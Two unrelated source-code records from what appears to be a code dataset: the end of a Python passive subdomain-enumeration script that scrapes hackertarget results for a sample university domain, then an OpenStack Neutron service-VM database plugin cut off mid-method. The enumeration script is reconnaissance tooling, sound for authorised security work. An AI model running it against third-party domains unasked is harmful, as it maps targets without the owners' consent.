driver.find_element_by_name("theinput").send_keys(Keys.ENTER) #定位键盘操作,查询
time.sleep(3)
text = driver.find_element_by_id("formResponse").text #包括域名和IP
links = list()
link_regx = re.compile('(.*?)'+self.domain+'') #匹配域名
links = link_regx.findall(text)
try:
for link in links:
if not link.startswith('http'):
link = "http://" + link + self.domain
subdomain = urlparse(link).netloc
if subdomain not in subdomains and subdomain != self.domain:
subdomains.append(subdomain.strip())
except Exception:
pass
return subdomains
driver.quit()
def main(domain):
"""
主函数,只需执行它就能get子域名
:param domain:
:return:
"""
dns_record = DnsRecord(domain)
set1 = dns_record.get_by_hackertarget()
return set1
if __name__ == '__main__':
# 自己在这个文件里尝试好,能获取子域名就提交上来
print(main("hubu.edu.cn")) # 输出hubu.edu.com的子域名 | b1ackc4t/getdomain | module/passive/dns_record.py | dns_record.py | py | 2,542 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "requests.Session",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Firefox",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "seleni... |
933336823 | import copy
import uuid
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.orm import exc as orm_exc
from neutron.api.v2 import attributes
from neutron.common import core as sql
from neutron.common import constants as n_constants
from neutron.common import utils
from neutron import context as t_context
from neutron.db import api as qdbapi
from neutron.db import common_db_mixin
from neutron.db import model_base
from neutron.db import models_v2
from neutron.db import l3_db as l3
from neutron.extensions import servicevm
from neutron.extensions import l3 as l3_ext
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from neutron.openstack.common import timeutils
from neutron.plugins.common import constants
from neutron.plugins.openvswitch import ovs_db_v2
from neutron.services.vm.common import constants as s_constants
from neutron.services.vm.mgmt_drivers.rpc import svm_rpc_joint_agent_api
LOG = logging.getLogger(__name__)
_ACTIVE_UPDATE = (constants.ACTIVE, constants.PENDING_UPDATE)
_ACTIVE = constants.ACTIVE
_ACTIVE_UPDATE_ERROR_DEAD = (
constants.PENDING_CREATE, constants.ACTIVE, constants.PENDING_UPDATE,
constants.ERROR, constants.DEAD)
DEVICE_OWNER_ROUTER_INTF = n_constants.DEVICE_OWNER_ROUTER_INTF
DEVICE_OWNER_ROUTER_GW = n_constants.DEVICE_OWNER_ROUTER_GW
DEVICE_OWNER_FLOATINGIP = n_constants.DEVICE_OWNER_FLOATINGIP
EXTERNAL_GW_INFO = l3_ext.EXTERNAL_GW_INFO
INSTANCE_HOST_ATTR = 'OS-EXT-SRV-ATTR:host'
###########################################################################
# db tables
class DeviceTemplate(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):
"""Represents template to create hosting device
"""
# Descriptive name
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
# service type that this service vm provides.
# At first phase, this includes only single service
# In future, single service VM may accomodate multiple services.
service_types = orm.relationship('ServiceType', backref='template')
# driver to create hosting device. e.g. noop, nova, heat, etc...
infra_driver = sa.Column(sa.String(255))
# driver to communicate with service managment
mgmt_driver = sa.Column(sa.String(255))
# vendor driver for device
device_driver = sa.Column(sa.String(255))
# if shared is True, all user access the template
shared = sa.Column(sa.Boolean(), nullable=False)
created_at = sa.Column('created_at', sa.DateTime(), nullable=True)
# (key, value) pair to spin up
attributes = orm.relationship('DeviceTemplateAttribute',
backref='template')
class ServiceType(model_base.BASEV2, models_v2.HasId):#, models_v2.HasTenant):
"""Represents service type which hosting device provides.
Since a device may provide many services, This is one-to-many
relationship.
"""
template_id = sa.Column(sa.String(36), sa.ForeignKey('devicetemplates.id'),
nullable=False)
servicetype = sa.Column(sa.String(255), nullable=False)
class DeviceTemplateAttribute(model_base.BASEV2, models_v2.HasId):
"""Represents attributes necessary for spinning up VM in (key, value) pair
key value pair is adopted for being agnostic to actuall manager of VMs
like nova, heat or others. e.g. image-id, flavor-id for Nova.
The interpretation is up to actual driver of hosting device.
"""
template_id = sa.Column(sa.String(36), sa.ForeignKey('devicetemplates.id'),
nullable=False)
key = sa.Column(sa.String(255), nullable=False)
#value = sa.Column(sa.String(4096), nullable=True)
value = sa.Column(sql.JsonCom(), nullable=False)
class Device(model_base.BASEV2, models_v2.HasTenant):
"""Represents devices that hosts services.
Here the term, 'VM', is intentionally avoided because it can be
VM or other container.
"""
id = sa.Column(sa.String(255),
primary_key=True,
default=uuidutils.generate_uuid)
template_id = sa.Column(sa.String(36), sa.ForeignKey('devicetemplates.id'))
template = orm.relationship('DeviceTemplate')
name = sa.Column(sa.String(255), nullable=True)
description = sa.Column(sa.String(255), nullable=True)
# sufficient information to uniquely identify hosting device.
# In case of service VM, it's UUID of nova VM.
instance_id = sa.Column(sa.String(255), nullable=True)
# For a management tool to talk to manage this hosting device.
# opaque string.
# e.g. (driver, mgmt_url) = (ssh, ip address), ...
mgmt_url = sa.Column(sql.JsonCom(), nullable=True)
# device auth info
auth = sa.Column(sql.JsonCom(), nullable=True)
attributes = orm.relationship("DeviceAttribute", backref="device")
services = orm.relationship('ServiceDeviceBinding', backref='device')
status = sa.Column(sa.String(255), nullable=False)
created_at = sa.Column('created_at', sa.DateTime(), nullable=True)
power_state = sa.Column('power_state', sa.String(36),
default=constants.DOWN, nullable=True)
class DeviceAttribute(model_base.BASEV2, models_v2.HasId):
"""Represents kwargs necessary for spinning up VM in (key, value) pair
key value pair is adopted for being agnostic to actuall manager of VMs
like nova, heat or others. e.g. image-id, flavor-id for Nova.
The interpretation is up to actual driver of hosting device.
"""
device_id = sa.Column(sa.String(255), sa.ForeignKey('devices.id'),
nullable=False)
key = sa.Column(sa.String(255), nullable=False)
# json encoded value. example
# "nic": [{"net-id": <net-uuid>}, {"port-id": <port-uuid>}]
#value = sa.Column(sa.String(4096), nullable=True)
value = sa.Column(sql.JsonCom(), nullable=True)
# this table corresponds to ServiceInstance of the original spec
class ServiceInstance(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):
"""Represents logical service instance
This table is only to tell what logical service instances exists.
There will be service specific tables for each service types which holds
actuall parameters necessary for specific service type.
For example, tables for "Routers", "LBaaS", "FW", tables. which table
is implicitly determined by service_type_id.
"""
name = sa.Column(sa.String(255), nullable=True)
service_type_id = sa.Column(sa.String(36),
sa.ForeignKey('servicetypes.id'))
service_type = orm.relationship('ServiceType')
servicetype = sa.Column(sa.String(255), nullable=False)
# points to row in service specific table if any.
service_table_id = sa.Column(sa.String(36), nullable=True)
# True: This service is managed by user so that user is able to
# change its configurations
# False: This service is manged by other neutron service like lbaas
# so that user can't change the configuration directly via
# servicevm API, but via API for the service.
managed_by_user = sa.Column(sa.Boolean(), default=False)
# mgmt driver to communicate with logical service instance in
# hosting device.
# e.g. noop, OpenStack MGMT, OpenStack notification, netconf, snmp,
# ssh, etc...
mgmt_driver = sa.Column(sa.String(255))
# For a management tool to talk to manage this service instance.
# opaque string. mgmt_driver interprets it.
mgmt_url = sa.Column(sql.JsonCom(), nullable=True)
attributes = orm.relationship("ServiceInstanceAttribute",
backref="serviceinstance")
devices = orm.relationship('ServiceDeviceBinding')
status = sa.Column(sa.String(255), nullable=False)
created_at = sa.Column('created_at', sa.DateTime(), nullable=True)
# TODO(yamahata): re-think the necessity of following columns
# They are all commented out for minimalism for now.
# They will be added when it is found really necessary.
#
# multi_tenant = sa.Column(sa.Boolean())
# state = sa.Column(sa.Enum('UP', 'DOWN',
# name='service_instance_state'))
# For a logical service instance in hosting device to recieve
# requests from management tools.
# opaque string. mgmt_driver interprets it.
# e.g. the name of the interface inside the VM + protocol
# vm_mgmt_if = sa.Column(sa.String(255), default=None, nullable=True)
# networks =
# obj_store =
# cost_factor =
class ServiceInstanceAttribute(model_base.BASEV2, models_v2.HasId):
"""Represents kwargs necessary for spinning up VM in (key, value) pair
key value pair is adopted for being agnostic to actuall manager of VMs
like nova, heat or others. e.g. image-id, flavor-id for Nova.
The interpretation is up to actual driver of hosting device.
"""
service_instance_id = sa.Column(sa.String(255),
sa.ForeignKey('serviceinstances.id'),
nullable=False)
key = sa.Column(sa.String(255), nullable=False)
# json encoded value. example
# "nic": [{"net-id": <net-uuid>}, {"port-id": <port-uuid>}]
#value = sa.Column(sa.String(4096), nullable=True)
value = sa.Column(sql.JsonCom(), nullable=True)
class ServiceDeviceBinding(model_base.BASEV2):
"""Represents binding with Device and LogicalResource.
Since Device can accomodate multiple services, it's many-to-one
relationship.
"""
service_instance_id = sa.Column(
sa.String(36), sa.ForeignKey('serviceinstances.id'), primary_key=True)
device_id = sa.Column(sa.String(36), sa.ForeignKey('devices.id'),
primary_key=True)
class DeviceAgentBinding(model_base.BASEV2):
"""Respresents binding between device and ServiceVM agents."""
device_id = sa.Column(sa.String(36),
sa.ForeignKey("devices.id", ondelete='CASCADE'),
primary_key=True)
servicevm_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id", ondelete='CASCADE'),
primary_key=True)
###########################################################################
class ServiceResourcePluginDb(servicevm.ServiceVMPluginBase,
common_db_mixin.CommonDbMixin):
@property
def _core_plugin(self):
return manager.NeutronManager.get_plugin()
@property
def l3_plugin(self):
try:
return self._l3_plugin
except AttributeError:
self._l3_plugin = manager.NeutronManager.get_service_plugins().get(
constants.L3_ROUTER_NAT)
return self._l3_plugin
def subnet_id_to_network_id(self, context, subnet_id):
subnet = self._core_plugin.get_subnet(context, subnet_id)
return subnet['network_id']
def __init__(self):
qdbapi.register_models()
super(ServiceResourcePluginDb, self).__init__()
def _get_resource(self, context, model, id):
try:
return self._get_by_id(context, model, id)
except orm_exc.NoResultFound:
if issubclass(model, DeviceTemplate):
raise servicevm.DeviceTemplateNotFound(device_tempalte_id=id)
elif issubclass(model, ServiceType):
raise servicevm.ServiceTypeNotFound(service_type_id=id)
elif issubclass(model, ServiceInstance):
raise servicevm.ServiceInstanceNotFound(service_instance_id=id)
elif issubclass(model, DeviceAgentBinding):
raise servicevm.DeviceNotFound(device_id=id)
if issubclass(model, Device):
raise servicevm.DeviceNotFound(device_id=id)
if issubclass(model, ServiceInstanceAttribute):
raise servicevm.ServiceInstanceAttributeNotFound(service_instance_id=id)
else:
raise
def _make_attributes_dict(self, attributes_db):
return dict((attr.key, attr.value) for attr in attributes_db)
def _make_service_types_list(self, service_types):
return [{'id': service_type.id,
'service_type': service_type.servicetype}
for service_type in service_types]
def _make_template_dict(self, template, fields=None):
res = {
'attributes':
self._make_attributes_dict(template['attributes']),
'service_types':
self._make_service_types_list(template.service_types)
}
key_list = ('id', 'tenant_id', 'name', 'description',
'shared','infra_driver', 'mgmt_driver',
'device_driver', 'created_at')
res.update((key, template[key]) for key in key_list)
return self._fields(res, fields)
def _make_services_list(self, binding_db):
return [binding.service_instance_id for binding in binding_db]
def _make_dev_attrs_dict(self, dev_attrs_db):
return dict((arg.key, arg.value) for arg in dev_attrs_db)
def _make_device_dict(self, device_db, fields=None):
LOG.debug(_('device_db %s'), device_db)
LOG.debug(_('device_db attributes %s'), device_db.attributes)
res = {
'services':
self._make_services_list(getattr(device_db, 'services', [])),
'device_template':
self._make_template_dict(device_db.template),
'attributes':
self._make_dev_attrs_dict(device_db.attributes),
}
key_list = ('id', 'tenant_id', 'name', 'description', 'instance_id',
'template_id', 'status', 'mgmt_url', 'created_at',
'power_state', 'auth')
res.update((key, device_db[key]) for key in key_list)
return self._fields(res, fields)
def _make_service_type_dict(self, service_type_db, fields=None):
res = {}
key_list = ('id', 'servicetype', 'template_id')
res.update((key, service_type_db[key]) for key in key_list)
return self._fields(res, fields)
def _make_service_device_list(self, devices):
return [binding.device_id for binding in devices]
#def get_service_instance_attr(self, context, service_instance_id, fields=None):
# service_instance_attr__db = self._get_resource(context, ServiceInstanceAttribute,
# service_instance_id)
# return self._make_service_attr_dict(service_instance_attr__db)
def _make_service_instance_dict(self, instance_db, fields=None):
res = {
'attributes':
self._make_attributes_dict(instance_db['attributes']),
'devices':
self._make_service_device_list(instance_db.devices),
'service_type':
self._make_service_type_dict(instance_db.service_type)
}
key_list = ('id', 'tenant_id', 'name', 'service_type_id',
'service_table_id', 'mgmt_driver', 'mgmt_url',
'status', 'created_at')
res.update((key, instance_db[key]) for key in key_list)
return self._fields(res, fields)
@staticmethod
def _infra_driver_name(device_dict):
return device_dict['device_template']['infra_driver']
@staticmethod
def _mgmt_driver_name(device_dict):
return device_dict['device_template']['mgmt_driver']
@staticmethod
def _device_driver_name(device_dict):
return device_dict['device_template']['device_driver']
@staticmethod
def _instance_id(device_dict):
return device_dict['instance_id']
###########################################################################
# hosting device template
def create_device_template(self, context, device_template):
template = device_template['device_template']
LOG.debug(_('template %s'), template)
tenant_id = self._get_tenant_id_for_create(context, template)
infra_driver = template.get('infra_driver')
mgmt_driver = template.get('mgmt_driver')
device_driver = template.get('device_driver')
service_types = template.get('service_types')
shared = template.get('shared')
if (not attributes.is_attr_set(infra_driver)):
LOG.debug(_('hosting device driver unspecified'))
raise servicevm.InfraDriverNotSpecified()
if (not attributes.is_attr_set(mgmt_driver)):
LOG.debug(_('mgmt driver unspecified'))
raise servicevm.MGMTDriverNotSpecified()
if (not attributes.is_attr_set(service_types)):
LOG.debug(_('service types unspecified'))
raise servicevm.SeviceTypesNotSpecified()
with context.session.begin(subtransactions=True):
template_id = str(uuid.uuid4())
template_db = DeviceTemplate(
id=template_id,
tenant_id=tenant_id,
name=template.get('name'),
description=template.get('description'),
infra_driver=infra_driver,
device_driver=device_driver,
shared=shared,
created_at=timeutils.utcnow(),
mgmt_driver=mgmt_driver)
utils.make_default_name(template_db, s_constants.PRE_DEV_TEM)
context.session.add(template_db)
for (key, value) in template.get('attributes', {}).items():
attribute_db = DeviceTemplateAttribute(
id=str(uuid.uuid4()),
template_id=template_id,
key=key,
value=value)
context.session.add(attribute_db)
for service_type in (item['service_type']
for item in template['service_types']):
service_type_db = ServiceType(
id=str(uuid.uuid4()),
template_id=template_id,
servicetype=service_type)
context.session.add(service_type_db)
LOG.debug(_('template_db %(template_db)s %(attributes)s '),
{'template_db': template_db,
'attributes': template_db.attributes})
return self._make_template_dict(template_db)
def update_device_template(self, context, device_template_id,
device_template):
with context.session.begin(subtransactions=True):
template_db = self._get_resource(context, DeviceTemplate,
device_template_id)
template_db.update(device_template['device_template'])
return self._make_template_dict(template_db)
def delete_device_template(self, context, device_template_id):
with context.session.begin(subtransactions=True):
# TODO(yamahata): race. prevent from newly inserting hosting device
# that refers to this template
devices_db = context.session.query(Device).filter_by(
template_id=device_template_id).first()
if devices_db is not None:
raise servicevm.DeviceTemplateInUse(
device_template_id=device_template_id)
context.session.query(ServiceType).filter_by(
template_id=device_template_id).delete()
context.session.query(DeviceTemplateAttribute).filter_by(
template_id=device_template_id).delete()
template_db = self._get_resource(context, DeviceTemplate,
device_template_id)
context.session.delete(template_db)
def get_device_template(self, context, device_template_id, fields=None):
template_db = self._get_resource(context, DeviceTemplate,
device_template_id)
return self._make_template_dict(template_db)
def get_device_templates(self, context, filters, fields=None):
return self._get_collection(context, DeviceTemplate,
self._make_template_dict,
filters=filters, fields=fields)
# called internally, not by REST API
# need enhancement?
def choose_device_template(self, context, service_type,
required_attributes=None):
required_attributes = required_attributes or []
LOG.debug(_('required_attributes %s'), required_attributes)
with context.session.begin(subtransactions=True):
query = (
context.session.query(DeviceTemplate).
filter(
sa.exists().
where(sa.and_(
DeviceTemplate.id == ServiceType.template_id,
ServiceType.service_type == service_type))))
for key in required_attributes:
query = query.filter(
sa.exists().
where(sa.and_(
DeviceTemplate.id ==
DeviceTemplateAttribute.template_id,
DeviceTemplateAttribute.key == key)))
LOG.debug(_('statements %s'), query)
template_db = query.first()
if template_db:
return self._make_template_dict(template_db)
###########################################################################
# hosting device
def _device_attribute_update_or_create(
self, context, device_id, key, value):
arg = (self._model_query(context, DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).
filter(DeviceAttribute.key == key).first())
if arg:
arg.value = value
else:
arg = DeviceAttribute(
id=str(uuid.uuid4()), device_id=device_id,
key=key, value=value)
context.session.add(arg)
# called internally, not by REST API
def _create_device_pre(self, context, device):
device = device['device']
LOG.debug(_('device %s'), device)
tenant_id = self._get_tenant_id_for_create(context, device)
template_id = device['template_id']
auth = device['auth']
name = device.get('name')
device_id = device.get('id') or str(uuid.uuid4())
attributes = device.get('attributes', {})
with context.session.begin(subtransactions=True):
template_db = self._get_resource(context, DeviceTemplate,
template_id)
device_db = Device(id=device_id,
tenant_id=tenant_id,
name=name,
description=template_db.description,
instance_id=None,
template_id=template_id,
created_at=timeutils.utcnow(),
status=constants.PENDING_CREATE,
auth=auth,
power_state=constants.DOWN)
utils.make_default_name(device_db, s_constants.PRE_DEVICE)
context.session.add(device_db)
for key, value in attributes.items():
arg = DeviceAttribute(
id=str(uuid.uuid4()), device_id=device_id,
key=key, value=value)
context.session.add(arg)
return self._make_device_dict(device_db)
# called internally, not by REST API
# intsance_id = None means error on creation
def _create_device_post(self, context, device_id, instance_id,
mgmt_url, device_dict):
LOG.debug(_('device_dict %s'), device_dict)
with context.session.begin(subtransactions=True):
query = (self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status == constants.PENDING_CREATE).
one())
# (xining) if create instance fail, instance_id is None, It can
# not update db
#query.update({'instance_id': instance_id, 'mgmt_url': mgmt_url})
if instance_id is None:
query.update({'status': constants.ERROR})
query.update({'mgmt_url': mgmt_url})
query.update({'instance_id': device_dict['instance_id']})
else:
query.update({'instance_id': instance_id, 'mgmt_url': mgmt_url})
for (key, value) in device_dict['attributes'].items():
self._device_attribute_update_or_create(context, device_id,
key, value)
def _register_agent_binding(self, context, device_id, instance):
host = getattr(instance, INSTANCE_HOST_ATTR)
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(context,
n_constants.AGENT_TYPE_SERVICEVM, host)
with context.session.begin(subtransactions=True):
binding_db = DeviceAgentBinding(device_id=device_id,
servicevm_agent_id=agent['id'])
context.session.add(binding_db)
def _create_device_status(self, context, device_id, new_status):
with context.session.begin(subtransactions=True):
(self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status == constants.PENDING_CREATE).
update({'status': new_status}))
def _get_device_db(self, context, device_id, current_statuses, new_status):
try:
device_db = (
self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status.in_(current_statuses)).
with_lockmode('update').one())
except orm_exc.NoResultFound:
raise servicevm.DeviceNotFound(device_id=device_id)
if device_db.status == constants.PENDING_UPDATE:
raise servicevm.DeviceInUse(device_id=device_id)
device_db.update({'status': new_status})
return device_db
def _update_device_pre(self, context, device_id):
with context.session.begin(subtransactions=True):
device_db = self._get_device_db(
context, device_id, _ACTIVE_UPDATE, constants.PENDING_UPDATE)
return self._make_device_dict(device_db)
def _update_device_post(self, context, device_id, new_status,
new_device_dict=None):
with context.session.begin(subtransactions=True):
(self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status == constants.PENDING_UPDATE).
update({'status': new_status}))
dev_attrs = new_device_dict.get('attributes', {})
(context.session.query(DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).
filter(~DeviceAttribute.key.in_(dev_attrs.keys())).
delete(synchronize_session='fetch'))
for (key, value) in dev_attrs.items():
self._device_attribute_update_or_create(context, device_id,
key, value)
def update_device_name_or_desc(self, context, device_id, name=None,
desc=None):
with context.session.begin(subtransactions=True):
(self._model_query(context, Device).
filter(Device.id == device_id).
one().
update({'name': name,
'description': desc}))
def _delete_device_pre(self, context, device_id):
with context.session.begin(subtransactions=True):
# TODO(yamahata): race. keep others from inserting new binding
binding_db = (context.session.query(ServiceDeviceBinding).
filter_by(device_id=device_id).first())
if binding_db is not None:
raise servicevm.DeviceInUse(device_id=device_id)
device_db = self._get_device_db(
context, device_id, _ACTIVE_UPDATE_ERROR_DEAD,
constants.PENDING_DELETE)
return self._make_device_dict(device_db)
def _delete_device_post(self, context, device_id, error):
with context.session.begin(subtransactions=True):
query = (
self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status == constants.PENDING_DELETE))
if error:
query.update({'status': constants.ERROR})
#(self._model_query(context, Device).
# filter(Device.id == device_id).delete())
else:
(self._model_query(context, DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).delete())
(self._model_query(context, Device).
filter(Device.id == device_id).delete())
#(self._model_query(context, DeviceServiceContext).
# filter(DeviceServiceContext.device_id == device_id).delete())
query.delete()
# reference implementation. needs to be overrided by subclass
def create_device(self, context, device):
device_dict = self._create_device_pre(context, device)
# start actual creation of hosting device.
# Waiting for completion of creation should be done backgroundly
# by another thread if it takes a while.
instance_id = str(uuid.uuid4())
device_dict['instance_id'] = instance_id
self._create_device_post(context, device_dict['id'], instance_id, None,
device_dict)
self._create_device_status(context, device_dict['id'],
constants.ACTIVE)
return device_dict
# reference implementation. needs to be overrided by subclass
def update_device(self, context, device_id, device):
device_dict = self._update_device_pre(context, device_id)
# start actual update of hosting device
# waiting for completion of update should be done backgroundly
# by another thread if it takes a while
self._update_device_post(context, device_id, constants.ACTIVE)
return device_dict
# reference implementation. needs to be overrided by subclass
def delete_device(self, context, device_id):
self._delete_device_pre(context, device_id)
# start actual deletion of hosting device.
# Waiting for completion of deletion should be done backgroundly
# by another thread if it takes a while.
self._delete_device_post(context, device_id, False)
def get_device(self, context, device_id, fields=None):
device_db = self._get_resource(context, Device, device_id)
return self._make_device_dict(device_db, fields)
def get_devices(self, context, filters=None, fields=None):
devices = self._get_collection(context, Device, self._make_device_dict,
filters=filters, fields=fields)
# Ugly hack to mask internaly used record
a = [device for device in devices
if uuidutils.is_uuid_like(device['id'])]
return a
def _mark_device_status(self, device_id, exclude_status, new_status):
context = t_context.get_admin_context()
with context.session.begin(subtransactions=True):
try:
device_db = (
self._model_query(context, Device).
filter(Device.id == device_id).
filter(~Device.status.in_(exclude_status)).
with_lockmode('update').one())
except orm_exc.NoResultFound:
LOG.warn(_('no device found %s'), device_id)
return False
device_db.update({'status': new_status})
return True
def _mark_device_error(self, device_id):
return self._mark_device_status(
device_id, [constants.DEAD], constants.ERROR)
def _mark_device_dead(self, device_id):
exclude_status = [
constants.DOWN,
constants.PENDING_CREATE,
constants.PENDING_UPDATE,
constants.PENDING_DELETE,
constants.INACTIVE,
constants.ERROR]
return self._mark_device_status(
device_id, exclude_status, constants.DEAD)
# used by failure policy
def rename_device_id(self, context, device_id, new_device_id):
# ugly hack...
context = t_context.get_admin_context()
with context.session.begin(subtransactions=True):
device_db = self._get_resource(context, Device, device_id)
new_device_db = Device(
id=new_device_id,
tenant_id=device_db.tenant_id,
template_id=device_db.template_id,
name=device_db.name,
description=device_db.description,
instance_id=device_db.instance_id,
created_at=timeutils.utcnow(),
mgmt_url=device_db.mgmt_url,
status=device_db.status)
context.session.add(new_device_db)
(self._model_query(context, DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).
update({'device_id': new_device_id}))
context.session.delete(device_db)
###########################################################################
# logical service instance
def _get_service_type(self, context, service_type_id):
service_type_db = self._get_resource(context, ServiceType,
service_type_id)
return service_type_db['servicetype']
# called internally, not by REST API
def _create_service_instance(self, context, device_id,
service_instance_param, managed_by_user):
"""
:param service_instance_param: dictionary to create
instance of ServiceInstance. The following keys are used.
name, service_type_id, service_table_id, mgmt_driver, mgmt_url
mgmt_driver, mgmt_url can be determined later.
"""
name = service_instance_param['name']
service_type_id = service_instance_param['service_type_id']
service_table_id = service_instance_param['service_table_id']
mgmt_driver = service_instance_param.get('mgmt_driver')
mgmt_url = service_instance_param.get('mgmt_url')
servicetype = self._get_service_type(context, service_type_id)
service_instance_id = str(uuid.uuid4())
LOG.debug('service_instance_id %s device_id %s',
service_instance_id, device_id)
with context.session.begin(subtransactions=True):
# TODO(yamahata): race. prevent modifying/deleting service_type
# with_lockmode("update")
device_db = self._get_resource(context, Device, device_id)
device_dict = self._make_device_dict(device_db)
tenant_id = self._get_tenant_id_for_create(context, device_dict)
instance_db = ServiceInstance(
id=service_instance_id,
tenant_id=tenant_id,
name=name,
service_type_id=service_type_id,
service_table_id=service_table_id,
servicetype=servicetype,
managed_by_user=managed_by_user,
status=constants.PENDING_CREATE,
mgmt_driver=mgmt_driver,
created_at=timeutils.utcnow(),
mgmt_url=mgmt_url)
utils.make_default_name(instance_db, s_constants.PRE_SERVICE)
context.session.add(instance_db)
context.session.flush()
self._add_service_instance_attr(context, service_instance_param,
service_instance_id)
binding_db = ServiceDeviceBinding(
service_instance_id=service_instance_id, device_id=device_id)
context.session.add(binding_db)
return self._make_service_instance_dict(instance_db)
def _update_attr_value(self, context, service_param, sid):
service_instance_db = self.get_service_instance(context, sid)
port_db_dict = {}
no_port_db_list = []
port_dict = {}
no_port_list = []
for key, value in service_instance_db['attributes'].items():
for v in value:
if v['floatingip_id']:
fip_ids = port_db_dict.get(v['fixed_port_id'], [])
fip_ids.append(v['floatingip_id'])
port_db_dict.update({v['fixed_port_id']: fip_ids})
else:
no_port_db_list.append(v['fixed_port_id'])
for key, value in service_param['attributes'].items():
for v in value:
if v['floatingip_id']:
fip_ids = port_dict.get(v['fixed_port_id'], [])
fip_ids.append(v['floatingip_id'])
port_dict.update({v['fixed_port_id']: fip_ids})
else:
no_port_list.append(v['fixed_port_id'])
for (port_id, fip_ids) in port_dict.items():
bind_fip_ids = list(set(fip_ids) - set(port_db_dict.get(port_id, [])))
for fip_id in bind_fip_ids:
admin_context = t_context.get_admin_context()
port = self._core_plugin.get_port(admin_context, port_id)
ip_address = port['fixed_ips'][0]['ip_address']
svm_fip_db = self.l3_plugin._get_floatingip(context, fip_id)
svm_fip_db.update({'fixed_ip_address': ip_address,
'service_instance_id': sid,
'fixed_port_id': port_id})
for (port_id, fip_ids) in port_db_dict.items():
no_bind_fip_ids = list(set(fip_ids) - set(port_dict.get(port_id, [])))
for fip_id in no_bind_fip_ids:
svm_fip_db = self.l3_plugin._get_floatingip(context, fip_id)
svm_fip_db.update({'service_instance_id': None,
'fixed_port_id': None,
'fixed_ip_address': None})
def _add_attr_value(self, context, service_param, sid):
admin_context = t_context.get_admin_context()
with admin_context.session.begin(subtransactions=True):
for (key, values) in \
service_param.get('attributes', {}).items():
if key in [s_constants.EXTERNAL_GATWAY_KEY,
s_constants.FLOATINGIP_KEY]:
for value in values:
fip_id = value.get('floatingip_id', None)
fixed_port_id = value.get('fixed_port_id')
port = self._core_plugin.get_port(admin_context, fixed_port_id)
if fip_id:
ip_address = port['fixed_ips'][0]['ip_address']
floatingip_db = self.l3_plugin._get_floatingip(context, fip_id)
floatingip_db.update({'fixed_ip_address': ip_address,
'service_instance_id': sid,
'fixed_port_id': fixed_port_id})
if fixed_port_id:
svm_port_db = self._core_plugin._get_port(admin_context, fixed_port_id)
svm_port_db.update({'service_instance_id': sid})
def _add_service_instance_attr(self, context, service_param, sid):
for (key, value) in \
service_param.get('attributes', {}).items():
attribute_db = ServiceInstanceAttribute(
id=str(uuid.uuid4()),
service_instance_id=sid,
key=key,
value=value)
context.session.add(attribute_db)
self._add_attr_value(context, service_param, sid)
# reference implementation. must be overriden by subclass
def create_service_instance(self, context, service_instance):
self._create_service_instance(
context, service_instance['service_instance'], True)
def _service_instance_attribute_update_or_create(
self, context, service_instance_id, key, value):
arg = (self._model_query(context, ServiceInstanceAttribute).
filter(ServiceInstanceAttribute.service_instance_id == service_instance_id).
filter(ServiceInstanceAttribute.key == key).first())
if arg:
arg.value = value
else:
arg = ServiceInstanceAttribute(
id=str(uuid.uuid4()),
service_instance_id=service_instance_id,
key=key, value=value)
context.session.add(arg)
def _update_service_instance_mgmt(self, context, service_instance_id,
mgmt_driver, mgmt_url):
with context.session.begin(subtransactions=True):
(self._model_query(context, ServiceInstance).
filter(ServiceInstance.id == service_instance_id).
filter(ServiceInstance.status == constants.PENDING_CREATE).
one().
update({'mgmt_driver': mgmt_driver,
'mgmt_url': mgmt_url}))
def _update_service_instance_check(self, context, service_instance_id,
service_instance):
service_instace = self.get_service_instance(context, service_instance_id)
attr = copy.deepcopy(service_instace['attributes'])
service = service_instance['service_instance']
for key, value in service.get('attributes', {}).iteritems():
if key in attr.keys() and attr[key] != value:
del attr[key]
return True
if key in attr.keys():
del attr[key]
if attr:
return True
return False
def _update_service_instance_pre(self, context, service_instance_id,
service_instance):
with context.session.begin(subtransactions=True):
instance_db = (
self._model_query(context, ServiceInstance).
filter(ServiceInstance.id == service_instance_id).
filter(Device.status == constants.ACTIVE).
with_lockmode('update').one())
instance_db.update(service_instance)
instance_db.update({'status': constants.PENDING_UPDATE})
return self._make_service_instance_dict(instance_db)
def _update_service_instance_post(self, context, service_instance_id,
status, new_service_instance=None):
with context.session.begin(subtransactions=True):
(self._model_query(context, ServiceInstance).
filter(ServiceInstance.id == service_instance_id).
filter(ServiceInstance.status.in_(
[constants.PENDING_CREATE, constants.PENDING_UPDATE])).one().
update({'status': status}))
if new_service_instance:
self._update_attr_value(context, new_service_instance,
service_instance_id)
service_instance_attrs = new_service_instance.get('attributes', {})
(context.session.query(ServiceInstanceAttribute).
filter(ServiceInstanceAttribute.service_instance_id == \
service_instance_id).
filter(~ServiceInstanceAttribute.key.in_(
service_instance_attrs.keys())).delete(
synchronize_session='fetch'))
for (key, value) in service_instance_attrs.items():
self._service_instance_attribute_update_or_create(context,
service_instance_id, key, value)
# reference implementation
def update_service_instance(self, context, service_instance_id,
service_instance):
service_instance_dict = self._update_service_instance_pre(
context, service_instance_id, service_instance)
self._update_service_instance_post(
context, service_instance_id, service_instance, constants.ACTIVE)
return service_instance_dict
def _delete_service_instance_pre(self, context, service_instance_id,
managed_by_user):
with context.session.begin(subtransactions=True):
service_instance = (
self._model_query(context, ServiceInstance).
filter(ServiceInstance.id == service_instance_id).
#cinghu
#filter(ServiceInstance.status == constants.ACTIVE).
with_lockmode('update').one())
